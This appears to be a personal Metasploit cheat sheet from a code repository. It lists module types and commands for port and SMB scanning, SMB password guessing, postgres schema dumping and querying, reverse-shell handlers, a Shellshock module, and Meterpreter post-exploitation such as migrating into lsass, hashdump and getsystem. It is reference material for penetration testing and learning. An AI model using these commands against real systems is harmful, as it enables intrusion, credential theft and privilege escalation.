2.3 KiB

Raw Blame History

Metasploit

Modules

Auxiliary scanners, crawlers and fuzzers
Encoders encode payloads
Evasion prepare payloads to circumvent signature based malware detection
NOPs various architectures
Payloads to run on target systems
- Singles, inline payloads, for example generic/shell_reverse_tcp
- Stagers, downloads the stages payloads
- Stages, for example windows/x64/shell/reverse_tcp
Post postexploitation

Notes

Search via scope

search type:auxiliary <stuff>

Send exploit to background

run -z

check if target is vulnerable
setg sets variables globally
unset payload
Flush via unset all

Sessions

background or ctrl+z
Foreground via sessions -i <number>

Scanning

Portscan

search portscan

UDP Sweep via scanner/discovery/udp_sweep
SMB Scan via scanner/smb/smb_version and smb_enumshares
SMB login dictionary attack scanner/smb/smb_login
NetBios via scanner/netbios/nbname
HTTP version scanner/http/http_version

Database

Start postgres
msfdb init
db_status
Separate workspace -a <projectname>
Safe scans via db_nmap
Show hosts
Show services
Set RHOST values via hosts -R

Database Operations

Dump schemas

use auxiliary/scanner/postgres_schemadump
run postgres://$DB_USER:$DB_PASS@172.10.0.42/postgres

Select table

use auxiliary/admin/postgres/postgres_sql
run postgres://$DB_USER:$DB_PASS@172.10.0.42/postgres sql='select * from users'

Exploits

show targets
show payloads

Reverse Shells

Multihandler, set options

use exploit/multi/handler
set payload <payloadhandler>

Shellshock as an example

use multi/http/apache_mod_cgi_bash_env_exec

Post Exploitation

load kiwi
load python

Windows

list SAM database

migrate <lsass.exe-PID>
hashdump

enum shares

post/windows/gather/enum_shares

Linux
- use post/linux/gather/hashdump

Other Meterpreter stuff

Staged and in disguise running as another servicename

getpid
ps

Attempt to elevate privileges

getsystem

Use multi/handler or exploit and get an overview via show payloads
UserID via getuid